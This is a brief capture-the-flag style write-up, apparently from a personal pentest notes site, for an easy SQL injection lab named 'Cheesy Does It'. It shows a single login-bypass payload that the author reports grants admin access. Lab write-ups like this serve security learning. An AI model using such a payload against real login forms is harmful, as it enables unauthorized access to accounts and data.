> For the complete documentation index, see [llms.txt](https://notes.dollarboysushil.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.dollarboysushil.com/web-application-pentest/bugforge/sql-injection-sqli/cheesy-does-it.md).

# Cheesy Does It

Level: Easy\
Points: 10\
Type: Daily Challenge

Lab Interface

<figure><img src="/files/RqAJcW5ANkKMZf7TovhK" alt=""><figcaption></figcaption></figure>

trying simple sqli payload, lets us login as admin

```
admin' or 1=1-- -
```

<figure><img src="/files/RTWeL4Q7gXBBGXKwsgj6" alt=""><figcaption></figcaption></figure>
